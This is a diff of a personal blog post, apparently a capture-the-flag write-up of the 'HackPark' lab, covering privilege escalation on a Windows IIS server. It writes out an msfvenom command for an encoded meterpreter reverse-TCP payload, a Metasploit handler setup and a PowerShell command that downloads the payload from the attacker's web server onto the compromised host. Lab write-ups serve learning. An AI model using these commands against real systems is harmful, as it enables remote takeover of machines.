bharathkarumudi/bharathkarumudi.github.io/5_HackPark.md

     c:\windows\system32\inetsrv>whoami
     iis apppool\blog

-The web server is running with user `iis apppool\blog`.
+The web server is running with the user `iis apppool\blog`.

 ### Privilege Escalation

-Lets create a meterpreter session for more stable executions, to do this, we need to create a payload using msfvenom:
+- Lets create a meterpreter session for more stable executions, to do this, we need to create a payload using msfvenom:
 `$ msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.2.18.4 LPORT=4444 -f exe -o shell.exe`

-Open a reverse shell handler in Metasploit using the `exploit/multi/handler` with payload `windows/meterpreter/reverse_tcp`
+- Open a reverse shell handler in Metasploit using the `exploit/multi/handler` with payload `windows/meterpreter/reverse_tcp` on port 4444.

-Start a simple web server using `python3 -m http.server` in same directory.
+- Start a simple web server using `python3 -m http.server` in same directory.
 In the reverse shell that was already opened earlier, with the help of powershell lets download the payload and start the process.
+-

     powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.2.18.4:8000/shell.exe','shell.exe')"
     c:\Windows\Temp>powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.2.18.4:8000/shell.exe','shell.exe')"